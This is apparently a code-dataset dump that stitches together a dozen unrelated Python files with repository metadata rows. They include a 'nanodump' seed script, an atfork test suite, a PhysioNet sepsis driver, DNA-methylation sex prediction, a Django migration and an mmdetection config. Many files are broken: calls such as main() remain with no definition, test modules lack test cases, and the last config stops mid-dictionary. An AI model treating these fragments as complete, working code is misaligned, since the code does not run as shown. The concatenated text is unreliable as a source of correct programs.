data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql10d-ml-opt/gql10d-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql10d_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql-ml-opt/gql-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
| 35.019231 | 100 | 0.665568 |
6a11d7dca909e3885ae2dbc3bc1e2d0a99547ada
| 3,901 |
py
|
Python
|
scripts/randomize_sw2_seed.py
|
epichoxha/nanodump
|
3a269ed427b474a701197e13ce40cb1daf803a82
|
[
"Apache-2.0"
] | null | null | null |
scripts/randomize_sw2_seed.py
|
epichoxha/nanodump
|
3a269ed427b474a701197e13ce40cb1daf803a82
|
[
"Apache-2.0"
] | null | null | null |
scripts/randomize_sw2_seed.py
|
epichoxha/nanodump
|
3a269ed427b474a701197e13ce40cb1daf803a82
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import glob
import random
import struct
if __name__ == '__main__':
main()
| 32.508333 | 104 | 0.600103 |
6a11fa8d863a9e5b451bd2a7ef2241aafe768509
| 1,289 |
py
|
Python
|
checker/checker/executer.py
|
grimpy/hexa-a
|
556e9a2a70758bf9c7d70f91776d361b40524c78
|
[
"Apache-2.0"
] | 3 |
2018-02-05T11:43:04.000Z
|
2019-02-22T18:11:55.000Z
|
checker/checker/executer.py
|
grimpy/hexa-a
|
556e9a2a70758bf9c7d70f91776d361b40524c78
|
[
"Apache-2.0"
] | 4 |
2019-03-26T09:51:43.000Z
|
2019-03-31T06:41:14.000Z
|
checker/checker/executer.py
|
grimpy/hexa-a
|
556e9a2a70758bf9c7d70f91776d361b40524c78
|
[
"Apache-2.0"
] | 1 |
2019-03-03T20:55:21.000Z
|
2019-03-03T20:55:21.000Z
|
from subprocess import run, PIPE, TimeoutExpired, CompletedProcess
from codes import exitcodes
| 30.690476 | 78 | 0.577967 |
6a124e6043f5f93ce124eed73efc4b8488512375
| 1,739 |
py
|
Python
|
pfm/pf_command/update.py
|
takahi-i/pfm
|
224ca961ca43f50bd877789e2d8659ae838d517f
|
[
"MIT"
] | 9 |
2018-01-06T05:44:43.000Z
|
2020-06-24T00:15:16.000Z
|
pfm/pf_command/update.py
|
takahi-i/pfm
|
224ca961ca43f50bd877789e2d8659ae838d517f
|
[
"MIT"
] | 27 |
2018-01-06T09:29:48.000Z
|
2020-04-10T16:11:59.000Z
|
pfm/pf_command/update.py
|
takahi-i/pfm
|
224ca961ca43f50bd877789e2d8659ae838d517f
|
[
"MIT"
] | 1 |
2018-01-09T01:33:42.000Z
|
2018-01-09T01:33:42.000Z
|
import json
from pfm.pf_command.base import BaseCommand
from pfm.util.log import logger
| 34.78 | 88 | 0.617021 |
6a12692597c07586454530c9bcf5baae61076b3f
| 7,499 |
py
|
Python
|
tests/atfork/test_atfork.py
|
luciferliu/xTools
|
324ef1388be13ece0d952e3929eb685212d573f1
|
[
"Apache-2.0"
] | null | null | null |
tests/atfork/test_atfork.py
|
luciferliu/xTools
|
324ef1388be13ece0d952e3929eb685212d573f1
|
[
"Apache-2.0"
] | null | null | null |
tests/atfork/test_atfork.py
|
luciferliu/xTools
|
324ef1388be13ece0d952e3929eb685212d573f1
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Licensed to the PSF under a Contributor Agreement.
#
# Author: Gregory P. Smith <[email protected]>
"""Tests for atfork."""
import os
import sys
import importlib
from xTool.compat import StringIO
import traceback
import unittest
from xTool import atfork
if __name__ == "__main__":
unittest.main()
| 37.123762 | 86 | 0.648887 |
6a131e98cf16cdcab3785e1e0af7a922aba56c50
| 2,213 |
py
|
Python
|
IO/files/handling.py
|
brendano257/Zugspitze-Schneefernerhaus
|
64bb86ece2eec147f2a7fb412f87ff2313388753
|
[
"MIT"
] | null | null | null |
IO/files/handling.py
|
brendano257/Zugspitze-Schneefernerhaus
|
64bb86ece2eec147f2a7fb412f87ff2313388753
|
[
"MIT"
] | null | null | null |
IO/files/handling.py
|
brendano257/Zugspitze-Schneefernerhaus
|
64bb86ece2eec147f2a7fb412f87ff2313388753
|
[
"MIT"
] | null | null | null |
import os
from pathlib import Path
__all__ = ['list_files_recur', 'scan_and_create_dir_tree', 'get_all_data_files', 'get_subsubdirs']
def list_files_recur(path):
"""
Cheater function that wraps path.rglob().
:param Path path: path to list recursively
:return list: list of Path objects
"""
files = []
for file in path.rglob('*'):
files.append(file)
return files
def scan_and_create_dir_tree(path, file=True):
"""
Creates all the necessary directories for the file at the end of path to be created.
When specified with a filepath to a file or folder, it creates directories until the path is valid.
:param Path path: must end with a filename, else the final directory won't be created
:param bool file: Boolean, does the given path end with a file? If not, path.parts[-1] will be created
:return None:
"""
parts = path.parts
path_to_check = Path(parts[0])
for i in range(1, len(parts)):
if not path_to_check.exists():
path_to_check.mkdir()
path_to_check = path_to_check / parts[i]
if file:
pass
else:
if not path_to_check.exists():
path_to_check.mkdir()
def get_all_data_files(path, filetype):
"""
Recursively search the given directory for .xxx files.
:param Path path: Path to search
:param str filetype: str, ".type" of file to search for
:return list: list of file-like Path objects
"""
files = list_files_recur(path)
files[:] = [file for file in files if filetype in file.name]
return files
def get_subsubdirs(path):
"""
Get the second-level subdirectories of the given path.
If given path 'a/b', a sample return would be ['a/b/c/d', 'a/b/c/d2', 'a/b/c/etc']
:param str path:
:return list: list containing Path instances for all paths found two levels below the supplied path
"""
leveltwo_subdirs = []
immediate_subdirs = [os.scandir(subdir) for subdir in os.scandir(path) if Path(subdir).is_dir()]
for scan in immediate_subdirs:
for subdir in scan:
leveltwo_subdirs.append(Path(subdir)) if Path(subdir).is_dir() else None
return leveltwo_subdirs
| 28.371795 | 106 | 0.66742 |
6a139742e2452134cace4ac02e78a8badeceb098
| 2,617 |
py
|
Python
|
tools/mo/openvino/tools/mo/ops/detection_output_onnx.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 1,127 |
2018-10-15T14:36:58.000Z
|
2020-04-20T09:29:44.000Z
|
tools/mo/openvino/tools/mo/ops/detection_output_onnx.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 439 |
2018-10-20T04:40:35.000Z
|
2020-04-19T05:56:25.000Z
|
tools/mo/openvino/tools/mo/ops/detection_output_onnx.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 414 |
2018-10-17T05:53:46.000Z
|
2020-04-16T17:29:53.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
from openvino.tools.mo.front.common.partial_infer.utils import dynamic_dimension_value, shape_array, set_input_shapes
from openvino.tools.mo.ops.op import Op
| 39.059701 | 117 | 0.635078 |
6a139aa59f68903a8a744250e0c92696c28eb301
| 2,046 |
py
|
Python
|
driver.py
|
FahimMahmudJoy/Physionet_2019_Sepsis
|
d31bec40aa0359071bfaff1a4d72569c5731a04e
|
[
"BSD-2-Clause"
] | 1 |
2019-06-26T19:38:33.000Z
|
2019-06-26T19:38:33.000Z
|
driver.py
|
FahimMahmudJoy/Physionet_2019_Sepsis
|
d31bec40aa0359071bfaff1a4d72569c5731a04e
|
[
"BSD-2-Clause"
] | null | null | null |
driver.py
|
FahimMahmudJoy/Physionet_2019_Sepsis
|
d31bec40aa0359071bfaff1a4d72569c5731a04e
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
import numpy as np, os, sys
from get_sepsis_score import load_sepsis_model, get_sepsis_score
if __name__ == '__main__':
# Parse arguments.
if len(sys.argv) != 3:
raise Exception('Include the input and output directories as arguments, e.g., python driver.py input output.')
input_directory = sys.argv[1]
output_directory = sys.argv[2]
# Find files.
files = []
for f in os.listdir(input_directory):
if os.path.isfile(os.path.join(input_directory, f)) and not f.lower().startswith('.') and f.lower().endswith('psv'):
files.append(f)
if not os.path.isdir(output_directory):
os.mkdir(output_directory)
# Load model.
model = load_sepsis_model()
print(model)
# Iterate over files.
for f in files:
# Load data.
input_file = os.path.join(input_directory, f)
data = load_challenge_data(input_file)
# print(type(data))
# Make predictions.
num_rows = len(data)
scores = np.zeros(num_rows)
labels = np.zeros(num_rows)
for t in range(num_rows):
current_data = data[:t+1]
current_score, current_label = get_sepsis_score(current_data, model)
scores[t] = current_score
labels[t] = current_label
# Save results.
output_file = os.path.join(output_directory, f)
save_challenge_predictions(output_file, scores, labels)
| 30.537313 | 124 | 0.623167 |
6a139fa7954e69a2e28f61ebd4a2c8e7028fb83e
| 2,589 |
py
|
Python
|
src/LspRuntimeMonitor.py
|
TafsirGna/ClspGeneticAlgorithm
|
25184afbbd52773b8aed2e268ae98dd9656cacda
|
[
"MIT"
] | null | null | null |
src/LspRuntimeMonitor.py
|
TafsirGna/ClspGeneticAlgorithm
|
25184afbbd52773b8aed2e268ae98dd9656cacda
|
[
"MIT"
] | null | null | null |
src/LspRuntimeMonitor.py
|
TafsirGna/ClspGeneticAlgorithm
|
25184afbbd52773b8aed2e268ae98dd9656cacda
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.5
# -*-coding: utf-8 -*
from collections import defaultdict
from threading import Thread
from time import perf_counter, time
from LspLibrary import bcolors
import time
import matplotlib.pyplot as plt
| 21.940678 | 71 | 0.545384 |
6a1517953444573e16ddd717619e49c3ca5152a5
| 70 |
py
|
Python
|
core/github/parsers/__init__.py
|
goranc/GraphYourCodeVulnerability
|
72c04ed5d63602f295d9ac31e97c97935ca78e1b
|
[
"Apache-2.0"
] | null | null | null |
core/github/parsers/__init__.py
|
goranc/GraphYourCodeVulnerability
|
72c04ed5d63602f295d9ac31e97c97935ca78e1b
|
[
"Apache-2.0"
] | 2 |
2021-12-22T11:59:47.000Z
|
2022-01-19T19:28:36.000Z
|
core/github/parsers/__init__.py
|
goranc/GraphYourCodeVulnerability
|
72c04ed5d63602f295d9ac31e97c97935ca78e1b
|
[
"Apache-2.0"
] | 5 |
2021-12-22T11:09:23.000Z
|
2021-12-26T10:18:49.000Z
|
from .python.parser import PythonParser
all_parsers = [PythonParser]
| 17.5 | 39 | 0.814286 |
6a152a32efa9784006230b4163868ce2479ff3ba
| 20,737 |
py
|
Python
|
methylcheck/predict/sex.py
|
FoxoTech/methylcheck
|
881d14d78e6086aab184716e0b79cdf87e9be8bf
|
[
"MIT"
] | null | null | null |
methylcheck/predict/sex.py
|
FoxoTech/methylcheck
|
881d14d78e6086aab184716e0b79cdf87e9be8bf
|
[
"MIT"
] | 11 |
2021-04-08T16:14:54.000Z
|
2022-03-09T00:22:13.000Z
|
methylcheck/predict/sex.py
|
FoxoTech/methylcheck
|
881d14d78e6086aab184716e0b79cdf87e9be8bf
|
[
"MIT"
] | 1 |
2022-02-10T09:06:45.000Z
|
2022-02-10T09:06:45.000Z
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
#app
import methylcheck # uses .load; get_sex uses methylprep models too and detect_array()
import logging
LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def _get_copy_number(meth,unmeth):
"""function to return copy number.
requires dataframes of methylated and
unmethylated values. can be raw OR corrected"""
# minfi R version:
# log2(getMeth(object) + getUnmeth(object))
return np.log2(meth+unmeth)
def get_sex(data_source, array_type=None, verbose=False, plot=False, save=False,
on_lambda=False, median_cutoff= -2, include_probe_failure_percent=True,
poobah_cutoff=20, custom_label=None, return_fig=False, return_labels=False):
"""This will calculate and predict the sex of each sample.
inputs:
=======
the "data_source" can be any one of:
path -- to a folder with csv data that contains processed sample data
path -- to a folder with the 'meth_values.pkl' and 'unmeth_values.pkl' dataframes
path -- to a folder also containing samplesheet pkl and poobah_values.pkl, if you want to compare predicted sex with actual sex.
data_containers -- object created from methylprep.run_pipeline() or methylcheck.load(path, 'meth')
tuple of (meth, unmeth) dataframes
array_type (string)
enum: {'27k','450k','epic','epic+','mouse'}
if not specified, it will load the data from data_source and determine the array for you.
median_cutoff
the minimum difference in the medians of X and Y probe copy numbers to assign male or female
(copied from the minfi sex predict function)
include_probe_failure_percent:
True: includes poobah percent per sample as column in the output table and on the plot.
Note: you must supply a 'path' as data_source to include poobah in plots.
poobah_cutoff
The maximum percent of sample probes that can fail before the sample fails. Default is 20 (percent)
Has no effect if `include_probe_failure_percent` is False.
plot
True: creates a plot, with option to `save` as image or `return_fig`.
save
True: saves the plot, if plot is True
return_fig
If True, returns a pyplot figure instead of a dataframe. Default is False.
Note: return_fig will not show a plot on screen.
return_labels: (requires plot == True)
When using poobah_cutoff, the figure only includes A-Z,1...N labels on samples on plot to make it easier to read.
So to get what sample_ids these labels correspond to, you can rerun the function with return_labels=True and it will
skip plotting and just return a dictionary with sample_ids and these labels, to embed in a PDF report if you like.
custom_label:
Option to provide a dictionary with keys as sample_ids and values as labels to apply to samples.
e.g. add more data about samples to the multi-dimensional QC plot
while providing a filepath is the easiest way, you can also pass in a data_containers object,
a list of data_containers containing raw meth/unmeth values, instead. This object is produced
by methylprep.run_pipeline, or by using methylcheck.load(filepath, format='meth') and lets you
customize the import if your files were not prepared using methylprep (non-standand CSV columns, for example)
If a `poobah_values.pkl` file can be found in path, the dataframe returned will also include
percent of probes for X and Y chromosomes that failed quality control, and warn the user if any did.
This feature won't work if a containers object or tuple of dataframes is passed in, instead of a path.
Note: ~90% of Y probes should fail if the sample is female. That chromosome is missing."""
allowed_array_types = {'27k','450k','epic','epic+','mouse'}
try:
from methylprep.files import Manifest
from methylprep.models import ArrayType
except ImportError:
raise ImportError("This function requires methylprep to be installed (pip3 install `methylprep`)")
(data_source_type, data_source) = methylcheck.load_processed._data_source_type(data_source)
# data_source_type is one of {'path', 'container', 'control', 'meth_unmeth_tuple'}
poobah=None
if data_source_type in ('path'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
try:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=False, verbose=False)
except Exception as e:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=True, verbose=False)
if include_probe_failure_percent == True and Path(data_source,'poobah_values.pkl').expanduser().exists():
poobah = pd.read_pickle(Path(data_source,'poobah_values.pkl').expanduser())
elif data_source_type in ('container'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=data_source, path=None,
compare=False, noob=False, verbose=False)
elif data_source_type == 'meth_unmeth_tuple':
(meth, unmeth) = data_source
if len(meth) != len(unmeth):
raise ValueError(f"WARNING: probe count mismatch: meth {len(meth)} -- unmeth {len(unmeth)}")
if array_type == None:
# get list of X any Y probes - using .methylprep_manifest_files (or MANIFEST_DIR_PATH_LAMBDA) and auto-detected array here
array_type = ArrayType(methylcheck.detect_array(meth, on_lambda=on_lambda))
elif isinstance(array_type,str):
if array_type in allowed_array_types:
array_type = ArrayType(array_type)
else:
raise ValueError(f"Your array_type must be one of these: {allowed_array_types} or None.")
if verbose:
LOGGER.debug(array_type)
LOGGER.setLevel(logging.WARNING)
manifest = Manifest(array_type, on_lambda=on_lambda, verbose=verbose)._Manifest__data_frame # 'custom', '27k', '450k', 'epic', 'epic+'
LOGGER.setLevel(logging.INFO)
x_probes = manifest.index[manifest['CHR']=='X']
y_probes = manifest.index[manifest['CHR']=='Y']
if verbose:
LOGGER.info(f"Found {len(x_probes)} X and {len(y_probes)} Y probes")
# dataframes of meth and unmeth values for the sex chromosomes
x_meth = meth[meth.index.isin(x_probes)]
x_unmeth = unmeth[unmeth.index.isin(x_probes)]
y_meth = meth[meth.index.isin(y_probes)]
y_unmeth = unmeth[unmeth.index.isin(y_probes)]
# create empty dataframe for output
output = pd.DataFrame(index=[s for s in meth.columns], columns=['x_median','y_median','predicted_sex'])
# get median values for each sex chromosome for each sample
x_med = _get_copy_number(x_meth,x_unmeth).median()
y_med = _get_copy_number(y_meth,y_unmeth).median()
# populate output dataframe with values
output['x_median'] = output.index.map(x_med)
output['y_median'] = output.index.map(y_med)
# compute difference
median_difference = output['y_median'] - output['x_median']
# median cutoff - can be manipulated by user --- default = -2 --- used to predict sex
sex0 = ['F' if x < median_cutoff else 'M' for x in median_difference]
# NOTE for testing: GSE85566/GPL13534 (N=120) has 4 samples that are predicted as wrong sex when using -2, but work at -0.5.
# populate dataframe with predicted sex
output['predicted_sex'] = sex0
output = output.round(1)
# if poobah_df exists, calculate percent X and Y probes that failed
sample_failure_percent = {} # % of ALL probes in sample, not just X or Y
if include_probe_failure_percent == True and isinstance(poobah, pd.DataFrame):
p_value_cutoff = 0.05
X_col = []
Y_col = []
failed_samples = []
for column in poobah.columns:
sample_failure_percent[column] = round(100*len(poobah[column][poobah[column] >= p_value_cutoff].index) / len(poobah.index),1)
failed_probe_names = poobah[column][poobah[column] >= p_value_cutoff].index
failed_x_probe_names = list(set(failed_probe_names) & set(x_probes))
failed_y_probe_names = list(set(failed_probe_names) & set(y_probes))
X_percent = round(100*len(failed_x_probe_names)/poobah.index.isin(list(x_probes)).sum(),1)
Y_percent = round(100*len(failed_y_probe_names)/poobah.index.isin(list(y_probes)).sum(),1)
X_col.append(X_percent)
Y_col.append(Y_percent)
if X_percent > 10:
failed_samples.append(column)
output['X_fail_percent'] = X_col #output.index.map(X_col)
output['Y_fail_percent'] = Y_col #output.index.map(Y_col)
if failed_samples != []:
LOGGER.warning(f"{len(failed_samples)} samples had >10% of X probes fail p-value probe detection. Predictions for these may be unreliable:")
LOGGER.warning(f"{failed_samples}")
if data_source_type in ('path'):
output = _fetch_actual_sex_from_sample_sheet_meta_data(data_source, output)
if plot == True:
fig = _plot_predicted_sex(data=output, # 'x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent'
sample_failure_percent=sample_failure_percent,
median_cutoff=median_cutoff,
include_probe_failure_percent=include_probe_failure_percent,
verbose=verbose,
save=save,
poobah_cutoff=poobah_cutoff,
custom_label=custom_label,
data_source_type=data_source_type,
data_source=data_source,
return_fig=return_fig,
return_labels=return_labels,
)
if return_labels:
return fig # these are a lookup dictionary of labels
if return_fig:
return fig
return output
def _plot_predicted_sex(data=pd.DataFrame(),
sample_failure_percent={},
median_cutoff= -2,
include_probe_failure_percent=True,
verbose=False,
save=False,
poobah_cutoff=20, #%
custom_label=None,
data_source_type=None,
data_source=None,
return_fig=False,
return_labels=False):
"""
data columns: ['x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent']
- color is sex, pink or blue
- marker circle size will be larger and more faded if poobah values are worse, smaller and darker if low variance. Like a probability cloud.
- sample text is (ID, delta age)
- sex mismatches are X, matched samples are circles (if samplesheet contains actual sex data)
- omits labels for samples that have LOW failure rates, but shows IDs when failed
- adds legend of sketchy samples and labels
- show delta age on labels (using custom column dict)
- unit tests with custom label and without, and check that controls_report still works with this function
- save_fig
- return_labels, returns a lookup dict instead of plot
if there is a "custom_label" dict passed in, such as (actual_age - predicted_age), it simply adds those this label to the marker text labels.
Dicts must match the data DF index.
"""
if sample_failure_percent != {} and set(sample_failure_percent.keys()) == set(data.index):
data['sample_failure_percent'] = pd.Series(sample_failure_percent)
else:
LOGGER.warning("sample_failure_percent index did not align with output data index")
#sns.set_theme(style="white")
show_mismatches = None if 'sex_matches' not in data.columns else "sex_matches"
if show_mismatches:
data["sex_matches"] = data["sex_matches"].map({0:"Mismatch", 1:"Match"})
show_failure = None if 'sample_failure_percent' not in data.columns else "sample_failure_percent"
sample_sizes = (20, 600)
if show_failure: # avoid sizing dots with narrow range; gives false impression of bad samples.
poobah_range = data["sample_failure_percent"].max() - data["sample_failure_percent"].min()
if poobah_range < poobah_cutoff/2:
show_failure = None
sample_sizes = (40,40)
custom_palette = sns.set_palette(sns.color_palette(['#FE6E89','#0671B7']))
# if only one sex, make sure male is blue; female is pink
# if hasattr(output, 'actual_sex') and set(output.actual_sex) == set('M')
# if first value to be plotted is male, change palette
if hasattr(data, 'predicted_sex') and list(data.predicted_sex)[0] == 'M':
custom_palette = sns.set_palette(sns.color_palette(['#0671B7','#FE6E89']))
fig = sns.relplot(data=data,
x='x_median',
y='y_median',
hue="predicted_sex",
size=show_failure,
style=show_mismatches,
sizes=sample_sizes,
alpha=.5,
palette=custom_palette,
height=8,
aspect=1.34)
ax = fig.axes[0,0]
fig.fig.subplots_adjust(top=.95)
# for zoomed-in plots with few points close together, set the min scale to be at least 2 units.
yscale = plt.gca().get_ylim()
xscale = plt.gca().get_xlim()
if abs(yscale[1]-yscale[0]) < 2.0:
ax.set_xlim(xmin=xscale[0]-1, xmax=xscale[1]+1)
ax.set_ylim(ymin=yscale[0]-1, ymax=yscale[1]+1)
label_lookup = {index_val: chr(i+65) if (i <= 26) else str(i-26) for i,index_val in enumerate(data.index)}
for idx,row in data.iterrows():
if "sample_failure_percent" in row and row['sample_failure_percent'] > poobah_cutoff:
label = f"{label_lookup[idx]}, {custom_label.get(idx)}" if isinstance(custom_label, dict) and custom_label.get(idx) else label_lookup[idx]
ax.text(row['x_median'], row['y_median'], label, horizontalalignment='center', fontsize=10, color='darkred')
else:
label = f"{custom_label.get(idx)}" if isinstance(custom_label, dict) else None
if label:
ax.text(row['x_median']+0.05, row['y_median']+0.05, label, horizontalalignment='center', fontsize=10, color='grey')
if return_labels:
plt.close() # release memory
return label_lookup
if "sample_failure_percent" in data.columns:
N_failed = len(data[data['sample_failure_percent'] > poobah_cutoff].index)
N_total = len(data['sample_failure_percent'].index)
ax.set_title(f"{N_failed} of {N_total} samples failed poobah, with at least {poobah_cutoff}% of probes failing")
else:
ax.set_title(f"Predicted sex based on matching X and Y probes.")
if save:
filepath = 'predicted_sexes.png' if data_source_type != 'path' else Path(data_source,'predicted_sexes.png').expanduser()
plt.savefig(filepath, bbox_inches="tight")
if return_fig:
return fig
plt.show()
def _fetch_actual_sex_from_sample_sheet_meta_data(filepath, output):
"""output is a dataframe with Sample_ID in the index. This adds actual_sex as a column and returns it."""
# controls_report() does the same thing, and only calls get_sex() with the minimum of data to be fast, because these are already loaded. Just passes in meth/unmeth data
# Sample sheet should have 'M' or 'F' in column to match predicted sex.
# merge actual sex into processed output, if available
file_patterns = {
'sample_sheet_meta_data.pkl': 'meta',
'*_meta_data.pkl': 'meta',
'*samplesheet*.csv': 'meta',
'*sample_sheet*.csv': 'meta',
}
loaded_files = {}
for file_pattern in file_patterns:
for filename in Path(filepath).expanduser().rglob(file_pattern):
if '.pkl' in filename.suffixes:
loaded_files['meta'] = pd.read_pickle(filename)
break
if '.csv' in filename.suffixes:
loaded_files['meta'] = pd.read_csv(filename)
break
if len(loaded_files) == 1:
# methylprep v1.5.4-6 was creating meta_data files with two Sample_ID columns. Check and fix here:
# methylcheck 0.7.9 / prep 1.6.0 meta_data lacking Sample_ID when sample_sheet uses alt column names and gets replaced.
if any(loaded_files['meta'].columns.duplicated()):
loaded_files['meta'] = loaded_files['meta'].loc[:, ~loaded_files['meta'].columns.duplicated()]
LOGGER.info("Removed a duplicate Sample_ID column in samplesheet")
if 'Sample_ID' in loaded_files['meta'].columns:
loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
elif 'Sentrix_ID' in loaded_files['meta'].columns and 'Sentrix_Position' in loaded_files['meta'].columns:
loaded_files['meta']['Sample_ID'] = loaded_files['meta']['Sentrix_ID'].astype(str) + '_' + loaded_files['meta']['Sentrix_Position'].astype(str)
loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
else:
raise ValueError("Your sample sheet must have a Sample_ID column, or (Sentrix_ID and Sentrix_Position) columns.")
# fixing case of the relevant column
renamed_column = None
if ('Gender' in loaded_files['meta'].columns or 'Sex' in loaded_files['meta'].columns):
if 'Gender' in loaded_files['meta'].columns:
renamed_column = 'Gender'
elif 'Sex' in loaded_files['meta'].columns:
renamed_column = 'Sex'
else:
renamed_columns = {col:(col.title() if col.lower() in ('sex','gender') else col) for col in loaded_files['meta'].columns}
loaded_files['meta'] = loaded_files['meta'].rename(columns=renamed_columns)
if 'Gender' in renamed_columns.values():
renamed_column = 'Gender'
elif 'Sex' in renamed_columns.values():
renamed_column = 'Sex'
if renamed_column is not None:
# next, ensure samplesheet Sex/Gender (Male/Female) are recoded as M/F; controls_report() does NOT do this step, but should.
sex_values = set(loaded_files['meta'][renamed_column].unique())
#print('sex_values', sex_values)
if not sex_values.issubset(set(['M','F'])): # subset, because samples might only contain one sex
if 'Male' in sex_values or 'Female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'Male':'M', 'Female':'F'})
elif 'male' in sex_values or 'female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'male':'M', 'female':'F'})
elif 'MALE' in sex_values or 'FEMALE' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'MALE':'M', 'FEMALE':'F'})
elif 'm' in sex_values or 'f' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'m':'M', 'f':'F'})
else:
raise ValueError(f"Cannot compare with predicted sex because actual sexes listed in your samplesheet are not understood (expecting M or F): (found {sex_values})")
output['actual_sex'] = None
output['sex_matches'] = None
for row in output.itertuples():
try:
actual_sex = str(loaded_files['meta'].loc[row.Index].get(renamed_column))
except KeyError:
if 'Sample_ID' in output.columns:
LOGGER.warning("Sample_ID was another column in your output DataFrame; Set that to the index when you pass it in.")
raise KeyError("Could not read actual sex from meta data to compare.")
if isinstance(actual_sex, pd.Series):
LOGGER.warning(f"Multiple samples matched actual sex for {row.Index}, because Sample_ID repeats in sample sheets. Only using first match, so matches may not be accurate.")
actual_sex = actual_sex[0]
if hasattr(row,'predicted_sex'):
sex_matches = 1 if actual_sex.upper() == str(row.predicted_sex).upper() else 0
else:
sex_matches = np.nan
output.loc[row.Index, 'actual_sex'] = actual_sex
output.loc[row.Index, 'sex_matches'] = sex_matches
else:
pass # no Sex/Gender column found in samplesheet
return output
| 53.583979 | 191 | 0.672711 |
6a15c95427effad3d19c61b8dfdb12b52e2999fa
| 649 |
py
|
Python
|
backend/accounts/migrations/0003_auto_20201115_1537.py
|
mahmoud-batman/quizz-app
|
bebeff8d055ea769773cd1c749f42408aa83f5b9
|
[
"MIT"
] | null | null | null |
backend/accounts/migrations/0003_auto_20201115_1537.py
|
mahmoud-batman/quizz-app
|
bebeff8d055ea769773cd1c749f42408aa83f5b9
|
[
"MIT"
] | null | null | null |
backend/accounts/migrations/0003_auto_20201115_1537.py
|
mahmoud-batman/quizz-app
|
bebeff8d055ea769773cd1c749f42408aa83f5b9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.2 on 2020-11-15 15:37
import django.core.validators
from django.db import migrations, models
| 32.45 | 277 | 0.697997 |
6a164cca97745158870c1da7ad0a330912380e28
| 2,504 |
py
|
Python
|
tests/test_basics.py
|
sirosen/git-fortune
|
69ef3e18506aa67fdc812854f1588828ea4e7448
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_basics.py
|
sirosen/git-fortune
|
69ef3e18506aa67fdc812854f1588828ea4e7448
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_basics.py
|
sirosen/git-fortune
|
69ef3e18506aa67fdc812854f1588828ea4e7448
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import subprocess
from git_fortune._compat import fix_line_endings
from git_fortune.version import __version__
def test_noargs(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
def test_category(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune", "--category", "diff"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
| 33.386667 | 81 | 0.527157 |
6a167dd5d92960139223aa44954c2cb6cacf4375
| 2,487 |
py
|
Python
|
configs/keypoints/faster_rcnn_r50_fpn_keypoints.py
|
VGrondin/CBNetV2_mask_remote
|
b27246af5081d5395db3c3105d32226de05fcd13
|
[
"Apache-2.0"
] | null | null | null |
configs/keypoints/faster_rcnn_r50_fpn_keypoints.py
|
VGrondin/CBNetV2_mask_remote
|
b27246af5081d5395db3c3105d32226de05fcd13
|
[
"Apache-2.0"
] | null | null | null |
configs/keypoints/faster_rcnn_r50_fpn_keypoints.py
|
VGrondin/CBNetV2_mask_remote
|
b27246af5081d5395db3c3105d32226de05fcd13
|
[
"Apache-2.0"
] | null | null | null |
_base_ = [
'../_base_/models/faster_rcnn_r50_fpn.py'
]
model = dict(
type='FasterRCNN',
# pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
